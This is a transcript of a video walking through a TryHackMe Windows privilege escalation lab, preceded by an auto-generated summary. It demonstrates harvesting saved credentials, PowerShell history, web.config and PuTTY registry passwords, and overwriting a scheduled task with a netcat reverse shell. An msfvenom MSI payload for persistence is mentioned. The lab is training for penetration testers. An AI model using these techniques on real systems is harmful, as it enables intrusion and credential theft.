Try Hack Me : Windows Privilege Escalation Part 1.
Summary
TLDRIn this video, the host delves into Windows privilege escalation, an essential skill in the junior penetration testing path. They discuss the common scenario of starting with unprivileged user access and leveraging it to gain administrative rights. Techniques include exploiting misconfigurations, service accounts, and scheduled tasks. The host demonstrates practical methods like using saved credentials and manipulating scheduled tasks for privilege escalation, providing a hands-on learning experience for viewers.
Takeaways
- 💻 The video discusses Windows privilege escalation, a technique used in penetration testing to gain higher access rights on a system.
- 🔄 The presenter acknowledges a delay in content release due to the vast amount of material to cover, emphasizing the importance of continuous learning.
- 👤 Unprivileged user accounts are common initial access points in pen testing, reflecting real-world scenarios where most network users have limited privileges.
- 🔑 Privilege escalation often involves exploiting misconfigurations, service accounts with elevated rights, or vulnerabilities in software or missing security patches.
- 🔍 The video highlights the importance of looking for credentials in various places such as text files, service accounts, and scheduled tasks.
- 📂 Different types of accounts like admin, standard users, and special built-in accounts each have varying levels of access and are potential targets for privilege escalation.
- 🔗 The script explains how service accounts, used for running services, can be a gateway to higher privileges due to their often elevated status.
- 🔎 Techniques for finding and exploiting saved credentials, such as those in PowerShell history or saved Windows credentials, are demonstrated.
- 🛠 The video provides practical examples of how to use command-line tools to check for and manipulate scheduled tasks, which can be abused for privilege escalation.
- 🔄 The concept of 'pivoting' through different accounts to gather various permissions and access is introduced as a strategic approach in pen testing.
- 🔒 The script concludes with a discussion on maintaining elevated privileges post-escalation, suggesting methods like editing the registry or using persistent malware.
Q & A
What is the main focus of the video script?
-The main focus of the video script is Windows privilege escalation, which is a continuation of the junior penetration testing path.
Why is it common to start with an unprivileged user account during a pen test?
-It is common to start with an unprivileged user account during a pen test because statistically, the majority of users on a network are regular users with limited access, and this scenario represents a realistic starting point for testing.
What are some ways unprivileged users can gain elevated privileges?
-Unprivileged users can gain elevated privileges by exploiting misconfigurations, finding credentials in text files, spreadsheets, or by taking advantage of excessive privileges assigned to their accounts, vulnerable software, or missing Windows security patches.
Why are service accounts significant when looking for privilege escalation opportunities?
-Service accounts are significant because they often have elevated privileges for certain functions, and their passwords are less frequently rotated, making them potential targets for gaining higher access.
What is the difference between a local system account and an administrator user account in Windows?
-A local system account has more privileges than an administrator user account. The system account can perform any action on the local machine, while an administrator user account has elevated privileges but is still limited in comparison.
How can saved Windows credentials be exploited for privilege escalation?
-Saved Windows credentials can be exploited by using the 'run as' command to execute actions or access resources with the saved user's higher privileges, which can aid in privilege escalation.
What is an unattended Windows installation and why is it relevant to privilege escalation?
-An unattended Windows installation is a method used in enterprise environments to deploy a single operating system image across multiple hosts. It is relevant to privilege escalation because admin credentials used in these installations might be stored in files like unattend.xml, which can be exploited if discovered.
How can the history file in PowerShell be used to find credentials?
-The history file in PowerShell can be used to find credentials by reviewing the commands that have been previously executed, which might include commands that used or displayed credentials.
What is the significance of the 'web.config' file in IIS and how can it be exploited?
-The 'web.config' file in IIS stores the configuration of the web server, including database connection strings and authentication mechanisms, which might contain service account credentials. Exploiting these credentials can lead to privilege escalation.
How can scheduled tasks be abused for privilege escalation?
-Scheduled tasks can be abused for privilege escalation by modifying the task to execute a malicious script or command when the task runs, especially if the task is configured to run with higher privileges or as an administrator.
What is the purpose of the 'run as' command in Windows?
-The 'run as' command in Windows allows a user to execute a program with the security privileges of a different user account, which can be used to perform actions that the current user does not have permission to execute.
Outlines
💻 Introduction to Windows Privilege Escalation
The video begins with an introduction to Windows privilege escalation, a topic that continues from the presenter's junior penetration testing path series. The presenter acknowledges the delay in content release due to the vast amount of material to cover. The focus is on escalating privileges on a Windows machine, starting from an unprivileged user account, which is common in enterprise environments during penetration testing. The video aims to cover up to task five or six due to the complexity of the content and the desire to ensure viewer comprehension. The importance of understanding privilege escalation is emphasized, as it is a realistic scenario where an attacker may start with limited access and aim to gain administrative control.
🔍 Exploiting Unprivileged User Access
This section delves into the concept of exploiting the limited access granted to unprivileged users. It discusses the common scenario where penetration testers begin with a regular user account and the necessity to escalate to administrative privileges. The video highlights the importance of service accounts, which often have elevated privileges and are frequently overlooked due to their nature of being used for specific services. The presenter also mentions the potential for privilege escalation through misconfigurations, excessive privileges assigned to accounts, and vulnerable software or missing security patches.
🔑 Harvesting Passwords and Exploiting Saved Credentials
The third paragraph discusses techniques for harvesting passwords and exploiting saved credentials on a Windows system. It covers the process of looking for credentials in text files, spreadsheets, and service accounts, which can be a pathway to higher privileges. The video also explains how to use the 'runas' command to execute tasks with different user privileges and how to list and potentially utilize saved credentials on the system. The presenter demonstrates how to use the 'cmdkey' command to list and potentially exploit saved credentials, which could lead to privilege escalation.
🕵️♂️ Investigating IIS Configurations and Leveraging Saved Credentials
This part of the video focuses on investigating Internet Information Services (IIS) configurations for stored passwords and authentication mechanisms. It explains how to find and exploit 'web.config' files that may contain sensitive information like database connection strings and service account credentials. The presenter also revisits the use of saved credentials with the 'runas' command to access files and resources that may require higher privileges. The video demonstrates how to pivot through different accounts to gather various permissions and access sensitive data.
🔄 Exploring Scheduled Tasks for Privilege Escalation
The fifth paragraph explores the use of scheduled tasks as a vector for privilege escalation. It explains how scheduled tasks can be executed with higher privileges and how an attacker might manipulate these tasks to run malicious code with elevated permissions. The video demonstrates how to query and potentially overwrite a scheduled task to include a reverse shell command, which, when executed, would provide the attacker with administrative access. The presenter also discusses the importance of checking the permissions of the current user to determine if they can modify or overwrite the task in question.
🏁 Maintaining Elevated Access with Registry Manipulation
The final paragraph covered in this session discusses methods for maintaining elevated access once it has been achieved. It touches on the use of registry manipulation to ensure persistent access even after the system is restarted. The video shows how to create a malicious MSI file using 'msfvenom' and how to set up a listener for the reverse shell. It also mentions the need for further steps to ensure the elevated access is not lost, such as editing the registry or setting up additional scheduled tasks. The presenter concludes by acknowledging the complexity of the topic and the need for adaptability when applying these techniques in different scenarios.
Mindmap
Keywords
💡Privilege Escalation
💡Penetration Testing
💡Unprivileged User
💡Service Accounts
💡Scheduled Tasks
💡Windows Credential
💡Powershell
💡Mik Cats
💡Web.config
💡Putty
💡Registry
Highlights
Introduction to Windows privilege escalation techniques for junior penetration testers.
Explanation of the common scenario where testers start with unprivileged user access in enterprise environments.
Discussion on the importance of understanding service accounts due to their elevated privileges.
Overview of different types of user accounts, including standard users and administrators.
Advantage of targeting service accounts for potential privilege escalation.
Techniques for finding credentials in text files and spreadsheets.
The significance of looking for misconfigurations in services and scheduled tasks.
How to exploit vulnerable software and missing Windows security patches for privilege escalation.
Tutorial on harvesting passwords from usual spots like unattended Windows installation files.
Method to retrieve credentials from PowerShell history files.
Step-by-step guide on accessing saved Windows credentials using command key list.
Exploration of extracting passwords from IIS configurations stored in web.config files.
Technique to retrieve credentials from software like PuTTY by querying the Windows registry.
Demonstration of using saved credentials to access restricted files and escalate privileges.
How to modify scheduled tasks to run malicious code at system startup for persistent access.
Practical example of editing a batch file associated with a scheduled task to include a reverse shell.
Final step of maintaining elevated privileges by editing the Windows registry.
Conclusion and预告 of the continuation in the next video, covering tasks five to eight.
Transcripts
[Music]
[Applause]
yo what's going on guys welcome back
today we are doing Windows privilege
escalation this is um a continu
continuation excuse me of the junior pen
testing path and we're going to keep
finishing it up I know it's been a while
since I posted on this but there's just
so much content out there that I'm
trying to get to you guys as fast as I
can but we're going to go ahead and dive
into it so this is just Windows
privilege escalation so once we take
over Windows machine so you can see we
have this Windows machine here it's very
slow and that's fine so it might take us
a little bit and we're probably not
going to get through all of it today
because I want to make sure you guys
understand so we'll probably get to task
five or six and then we'll stop there so
first things first during a pen test you
will often have access to Windows host
with an unprivileged user this is true
so it's almost always going to be when
you um are on Enterprise environment
during pen testing you're probably going
to a regular user account first that's
just the way it is because I mean if you
think about statistically speaking the
majority of users on a network are
regular unprivileged users so
statistically you're most likely to get
them so just think of it that way yes by
all means if you can get an admin
account right off the bat go for it
don't waste your time with all this but
that's not realistic to do in every s
situation you need to know how to do
this so unprivileged users hold limited
access including files folders and no
means perform admin tasks true but we
can take advantage of what they do have
access to to get that admin permissions
so let's go a and dive into it if you
guys like this content if you guys are
enjoying the video hit that like button
hit the sub button helps me tremendously
grow and I appreciate everything you
guys do for me so here we go so simply
put privilege escalation I'm not going
to read the definition but consists of
using given access to a host with user a
so basically what they're saying is I
have access to user a and now I can gain
access ACC to user B which has higher
permissions right um so that would be an
admin in this case or that's what we're
the goal is right the all long-term goal
or the overall goal is a domain admin um
but we don't need to dive too deep into
that here this is just privilege
escalation so gaining access to differ
account different accounts can be as
simple as finding credentials and text
files spreadsheets this is true the one
thing I don't think um they cover very
much they don't cover uh service
accounts and service accounts usually
have elevated privileges at least for
certain functions and so I wish they
covered it more but those are something
you should look for when you're doing a
pen test always always always is service
accounts because they are very hard to
rotate passwords for one for two they
also um typically have like I said have
elevated privileges at least for that
function that's it's doing and then for
three it's less likely that people are
going to be watch like weirded out by
that ser service account logging into
other machines because it is a service
account if you're not familiar with what
a service account is um basically it's
an account that you use to run a service
on a machine so if I needed to connect
this machine over to this machine and I
need to do it regularly using an
application or something I will use a
service account so that way it's not
logging in using my account it's not
logging in using your account it's using
an account specific to that service so
gaining access to different accounts can
be as simple as finding them in a text
file which is true it's actually not
uncom common um misconfigurations on
services or scheduled tasks that's how
these are the ones we're going to um
abuse excessive privileges assigned to
the account vulnerable software which is
always known missing Windows security
patches also so before jumping into the
techniques let's look at the different
types of accounts so you have your
admins this is your regular admin right
like this has elevated privileges they
can change system configuration
parameters and access files so yeah we
know what an admin is I don't need to
explain to you your standard users these
are people that can log into the machine
and do standard activity they can look
at things they can do stuff but they
can't do any admin tasks okay any user
with the administrator privileges will
be part of the admin group on the other
hand s users are part of the user group
keep in mind what they're talking about
here is not is not domain joined meaning
these are accounts that are just default
on Windows when you get into an
Enterprise level pent testing situation
what you're looking at is there will be
multiple groups it won't just be
standard users admins there be
everything in between there'll be people
with a lot of permissions but they don't
have admin right those are still people
that you want to get those are still
targets because they might have access
to a lot more stuff but they're just not
considered a full admin so those are
keep that in mind that when you need to
learn active directory and users of
groups um organizational units and
everything like that because that's
where you start to see the elevated
privileges where you may not get a full
domain admin but you're still getting
elevated privileges
now any user with administrative
privileges will be the administrator
group right so these are local users
that's what we're talking about here
local we're not talking about on a
domain in addition to that you will
usually hear about some special built-in
accounts used by the operating system
okay so they are talking about excuse me
here they are talking about domain
joined they just are only breaking them
down as two types which isn't the case
um yeah it's not the case because there
will be everything in between that there
will be standard users that are maybe
help desk that have elevated privileg
they can change things in active
directory that doesn't mean they're a
full domain admin right so just keep
that in mind um the system the local
system accounts these are accounts that
are just local to the machine meaning it
can only log into that machine it can't
log into all the machines on the domain
but it has full access um so the system
itself will you'll see it all the time
in the logs the system itself will run
when it's doing Windows tasks right when
when your system comes by default it's
going to have these the system account
and it's running all the time right
that's that's just normal activity that
is it's going to be using the system
itself to run tasks and that's the
account it's using the local service
default account to run Windows services
with minimum privileges so this is if
you need to run it without admin
privileges if you have a task that
Windows needs to run but not run as
admin if you've ever ran something and
it says like uh don't doesn't have
permissions or something and then you
run it as admin and it works that's the
difference um network service default
account used for um to Windows services
with minimum privileges it will use
computer credentials there you go so it
will use the basically the account will
use the computer's credentials to
authenticate through a network so pretty
self-explanatory now users that can
change system configurations that's
admin the system account oh sorry the
system account has more privileges than
administrator user a or nay I don't
think a is maybe that's just a UK thing
because I think tryck is from UK but
um I or nay or but anyway um so a so yes
they it does and the reason is it's the
system it can do whatever it wants right
it is the system so that's why when you
try to take over a machine typically
with like a interpreter shell or
something you want to get system access
even if you have an admin account system
access is always has more okay so now
harvesting passwords from usual spots so
this is where you're going to whoops
excuse me this is where you're going to
look for and this is the the machine
that started right here so okay
unattended Windows installation when
installing and this is this actually is
very common but you guys have to if you
work never worked in um an Enterprise
environment or any um Network
environment like this then this might be
foreign to you when installing Windows
on a large number of hosts admins use
Windows deployment Services okay so they
put an image out there right and that
image sits out there and when it does
they basically say hey image this
machine or image all these machines with
a new image or whatever and it has that
image sitting out there where it can
grab it right that's the whole point so
which allows for single operating system
image to be deployed through S host so
you can store this image it knows where
to reach them everybody can grab them
and it will start installing the image
if you don't know when I say image
because I know that some of you may it
may be new to you that means the
security posture the way Windows is set
up if you set up windows in a specific
way meaning you download it you have all
your applications for your company you
have all of your um different local
admin accounts that you need you have
your break glass accounts those types of
things you have everything set up the
way you want you then take a snapshot an
image of that and you say this is how I
want every machine set up and then you
can push that to everybody that's what
they're doing here now these kinds of
installations are referring to un
unattended installations meaning
nobody's sitting there doing anything
the user doesn't have to log in you can
just push this to people right or you
can have it set up and then when you
plug a new computer in and and join in
the domain it will pull that image okay
such installations require the use of an
admin account which is true which might
end up being stored in the machine in
the following locations so you can see
unattended XML Panther unattended system
32 CIS prep D the reason these are
stored there is because it has to use
admin credentials and this is unattended
meaning I don't want to have to type in
my credentials every time for every
person so I store them so it can go grab
them later right so as part of these
files you might encounter these so you
can actually go look for these if you
have access to that machine pretty
interesting it's a pretty good way to
look for it especially if you know the
machine has been CIS prepped that's what
it's called CIS prep is when you're
Imaging the
machine when I say that it means you're
grabbing that snapshot okay whenever a
user runs a command using Powershell it
gets stored into a file that keeps
memory this is a history file right bash
has the same thing you can type history
on bash and you can see they're going to
go ahead and do this the reason they do
this that you look for the history is
because there's a lot of times when
running commands that you have to put
your credentials in to run that command
on another machine or something and if
you don't hide it meaning you don't have
it as a secure credential or something
like that it will just show it it'll
display
it um okay saved window Windows
credentials Keys Windows allows users to
use other users credentials which we
know this functional also gives option
to save these credentials on the system
so command key list will actually do
that so what that means is you can save
credentials so that you can run like
let's say you had a service account and
you need to run a task as that service
you can save those credentials well here
you can list them while you can't
actually see the passwords if you notice
the credentials worth trying if you
notice any credentials worth trying
excuse me um you can use them with run
as command and save credit options so
what that means is here you won't see
the credential like you you'll see the
username but you won't see the password
but if you know Windows you can run as
what that means is I can run the command
as the user that they said I have in
question so I'll show you what I
mean so I don't I haven't um done this
box in a long time so I don't remember
but if they actually have one here but
we'll
try we'll try and make this a little bit
bigger for you
guys that way you can see it we'll make
it 36 see how if that's too big okay so
what we're going to do is we're going to
type
CMD key list and see if there is a list
of keys currently stored
credentials it looks like we have user W
privilege escalation mic. cats so what
we could do is we could say run
as save
cred right and then we could say
user and that user would be this W priv
escalation
one and we'd say and you may not have to
put the domain there so mike. cats and
it should CM so we're going to run
cmd.exe
and look at that so we actually ran a
new command shell and you can see up
here running as Mike cats so I'm
actually able to run now shell as this
new user because they saved the
credential there so that's actually
pretty interesting so that's one way to
look for for credentials as well IAS
configurations if you don't know what
IAS is if you've heard of Apache
anything like that IAS is the um way
that Microsoft runs their web servers so
it's a web server is all it is but you
can see internet Information Services is
the default web server the configuration
of the is is stored on a file called
web.config so if you can find that
web.config it can store passwords for
that database and configured
authentication mechanisms meaning there
might be service accounts in there so
you can see here here's a a quick way to
find database connection strings on um
the file so one thing to keep in mind
that I see all the time with people that
do ctfs is they run into this situation
where they they think that I have to go
straight here to admin here to admin
what you can do and what you should be
doing is looking at doing things like
running this command for instance
starting up a command. exe right using
mik cats well mik cats might have more
permissions than we do we might not have
had permissions to access the IAS file
but now we might have permissions to
access that IAS file so now we can do
this and I don't know if this is
actually if they have it on this m
machine or not
but why is this not
uh okay so it didn't copy and paste but
so then you would run the type Command
right and we'd say type
c
Windows
microsoft.net
framework 64 let's see yep it does
actually have it so version
4.
3319
config web and if a little trick if you
don't know if something exists just try
and tab it and if it finishes it you
know you're good and then you just say
find string and connection
string and we hit enter do the same
thing and I think you have to capitalize
the S and see if it finds
it okay and there it found it right so
you can see here's the user ID and
here's the password so we actually were
able to pull the is configuration but
the key here is you may have to Pivot
through a lot of accounts to get
different permissions right to gather
different things so if there's an is
server maybe I can't grab the is logs
maybe I don't have permission to access
those but we then use the save
credentials M cats we then can access
the I credentials and things like that
so make sure you're pivoting around and
messing with it don't just think you
have to go from here to here right it's
not a straight jump all the time okay so
now you can retrieve credentials from
software from putty so putty is an SSH
client and you can see here what they're
doing is they're um quering the registry
and they're asking in for the software
putty and they're looking at the
sessions so what they're doing is and
we'll just do it again with Mike Catz
actually we'll do it with the regular so
you can see it because I made it
bigger they're just saying okay registry
we want to query the registry and we
want to say h key if you didn't know the
registry is is
basically every file in the in the M um
system it's kind of like how L Linux
excuse me um how Linux everything's a
file when Windows is the same way just
it's a registry key and it's got a
whoops it's got a binary one or zero
true or
false okay putty
sessions F and we'll say proxy so we're
looking for the proxy s all right we hit
enter and you can see we're getting the
S the um putty sessions and look one of
them's called my SSH server when we do
that look at the name Tom Smith Cool
Pass 2021 so right away we've gotten
Mike cat's account we've got this one
here we ended up getting the um the one
for IIs as well so we've gotten a bunch
of usernames just from kind of changing
our tactics around right now a password
for the julia. Jones user has been left
on the Powershell history what is the
password so let's go back and let's look
at what the here we go console history
so we need to go and get the history
so we say Okay type and type just opens
a file so if you're wondering we say
type and we say user
profile and we're going to say app
data app
data
roaming
Microsoft uh let's see did I mess
something up because it's not tabing but
that's all right user profile no should
be good Microsoft
Windows
Powershell PS
readline console host history. txt
change that see even though actually
Windows is not case sensitive and you
can see here's the last things ran on
Powershell who but we ran LS Who Am I
who Am I priv who am I groups and you
can see they added a user on the domain
controller named Julia Jones password
zuper cret pass okay so we say Z CR pass
boom we got passed it okay so now we say
a web server is running on the remote
host find any interesting passwords on
the web config file well we already did
that we did that in Mike cat's
um one so that's why I'm not going to do
it again but we did that on Mike cats
already so we got that password and then
there is a saved password on your
windows credential on your windows
credentials excuse me using command key
and run as spawn a shell for my cats and
retrieve okay so we already did
that so now we just got to retrieve the
flag from his desktop because we're not
able to access that without it so now we
say
CD and we'll go
C
users might
cats
desktop and then we say dur because
there's no LS which is kind of funny
that there was no LS it says it's not um
recognized but then the history shows
that there was LS ran that's kind of
actually funny I just thought about that
and then we say type flag.txt
then THM what is my password there it is
you can see the first one is Powershell
is LS on the history which is kind of
funny like I said because LS is not part
of it supposedly
um but that's because this version just
doesn't have it okay um but I guess okay
I never mind I correct myself because
this is the Powershell history I'm using
command prompt that's on me I wasn't
paying attention all right so now let's
retrieve the password stored in the
saved putty session well we just did
that too and that's right here Cool Pass
2021 all all right so let's keep going
so now we've got other quick wins so now
schedule tasks so this is actually
something that you should be doing on
Windows Linux everything looking at
scheduled tasks so we're going to say
scheduled tasks query and what these are
is they are just tasks that they someone
scheduled and said hey I want these to
basically um run at whatever time I tell
it or however often I tell it or
whatever right so we want to say okay we
need to
get a list of the scheduled tasks right
but we don't want to search through all
of them so we're looking and it looks
like it's at system startup for one but
you can see we already knew the name the
name of it was vul task so that's why we
put Vol task in there we searched for
vul task so it's kind of cheating
because we knew the name of it and you
would have to look normally but we're
looking and we're trying to see what
kind of users can we get right scheduled
task can be listed from the command line
da da da da okay you'll get lots of
information about the task for us the
Tas task to run parameters which
indicates what gets executed by the
scheduled task so this is what's
important you see how it says C task
schedu task. bat it's a batch file if we
can manipulate that file if we can edit
it then when the schedule task runs it
runs our file whatever we want right so
that's one way to elevate privileges
right there and you can see it starts at
at system startup so if we could if we
could get this to run right we could or
if we could edit that we could edit it
and you notice it runs as admin we can
edit that to instead of do whatever it
does now do a reverse shell to us
restart the system and it would
automatically connect to us every time
it restarted and nobody would know right
now there might be some detection that
pops up but still okay so now you can
see if our current user can modify or
overwrite the task yep and you can see
here we have to check permissions so we
use and you can see we used um IAL ials
which is I believe part of this is
internal Street I could be wrong on that
it might just be default um so now you
say tasks and we already know the the
path right because it just gave it to us
so it's scheduled task.
bat okay and you can see n Authority
system okay so right here built-in users
has I and F and you can see here F has
full access so that means we have full
access to it so this means we can modify
it so we could easily say we want it to
be a net cat shell and then we want it
to and then we could just start the
system and then boom because if you
notice it runs as as a administrator we
now have ad administrator access so
that's how you do
that and you can see here all you have
to do is say Echo C tools because
they've already added netcat on here and
command. exe and they're saying run the
scheduled task for us um or they're
saying I'm sorry no they're not they're
saying Echo this as the actual script
and then let's see what the task says
does it need to do it uh yeah I think we
do need to actually do it so let's go
ahead and do this one so we're just
going to say same exact thing Echo
because that's just GNA we're going to
edit it right we're going to say C tools
and if you don't know um Windows is not
case sensitive so don't stress about the
case sensitivity exe Tech cmd.exe so all
we're doing is saying netcat run and
execute command. exe and then our IP
address is Right
Here let open this up get the IP 1010
4584 1010
4584 1010
4584 10 10
4584 and then we'll
say where was it there we go we're going
to use same port 4444 just cuz we know
it's not in use but normally I wouldn't
use that cuz that's the default
interpreter port and that will be
blocked by most
companies uh tasks scheduled task
dobat task dobat okay so we should be
able to here we're actually completely
overwriting
it okay so now we have to go back here
we have to start up a netcat listener
so we'll say
netcat lvmp 4444
okay so now that's listening now we just
go back here and we have to run the new
scheduled task that we just created or
it's we didn't create a new one excuse
me the one we edited so schedule tasks
run and then it's called vom task so we
run it attempted to run says successful
but it says
attempted okay and look at that we have
a shell and we have a full elevated
permission so who am I
why does that look
weird that looks weird I don't know why
it looked weird the first time so you
can see here we're task user one okay
interesting the reason that's
interesting is because I actually
thought we would get
um full admin permissions but maybe I
looked at it wrong um okay so task user
one was expected I wonder if I looked at
it
wrong maybe I didn't even notice that
task user one was in the one running it
oh that's the author I was looking at
wrong yep that's the author task user
one is who's running it okay so that's
on me I looked at it wrong um but that's
good good to know so now we have this
full shell right so now we can stay here
and now we have whatever we need which
is what is Task user one flag so we can
say CD whoops CD
c
users and then CD task user
one and then CD
desktop CD desktop and then we can say
cat flag.txt
and okay type flag.txt
and THM task completed there we go so we
actually did that test no problem now
here you can say see how we're going to
always stay elevated so what they're
doing is they're actually editing the um
registry excuse me so you can see this
method requires two registry values to
be set so we need to set these first
we're querying them right and then we're
actually creating a malicious. MSI here
we're creating that msf Venom reverse
shell and then here we're actually
putting it right in the temporary
directory um you should also run the
medit Handler module configured
accordingly once you have transferred
the file you've created you can run the
installer with the command below and
receive the reverse shell so you can see
this will actually go ahead um and make
sure that these are set now does this
work currently I will tell you it
probably won't um because it'll probably
be busted but there's ways around that
I'm just saying this is a good example
of how to stay always elevated you can
change a registry um edit you can make
another scheduled task you could do all
kinds of things to stay elevated as that
user once you have that user's
configuration all right I was going to
try to get to task five but I think
we're going to stop there um let's see
how long yeah it'll take us a little bit
to get to task five let's see yeah this
is a long one so I'm going to stop there
that's a 30 minutes that's good we'll
finish task five six seven and then
eight next time because then that's it
so tools of the trade there's no actual
questions so that'll be it so hopefully
this helps you guys hopefully you guys
are following along in this path the
junior pen testing path and learning
something because a lot of these are
very rudimentary and you might say they
don't work anymore they do it's just you
have to manipulate them in a way you
have to understand the technical aspects
and understand that yeah it might not
work where I run just that msf Venom
payload that they laid out for me but if
I can change things I can make it work
for me so hopefully this helps you guys
and hopefully you guys like this path
let me know if you do and thank you have
a good day
Ver Más Videos Relacionados
SickOS 1.2: Vuln Hub OSCP like Box Complete Walkthrough
Simple Penetration Testing Tutorial for Beginners!
My Favorite API Hacking Vulnerabilities & Tips
Chapter #8 - Cloud IAM Basics | identity & access management on google cloud platform (gcp)
Solved: Lost admin rights in Windows 11
How Can You Learn DevOps Faster 🚀🚀
5.0 / 5 (0 votes)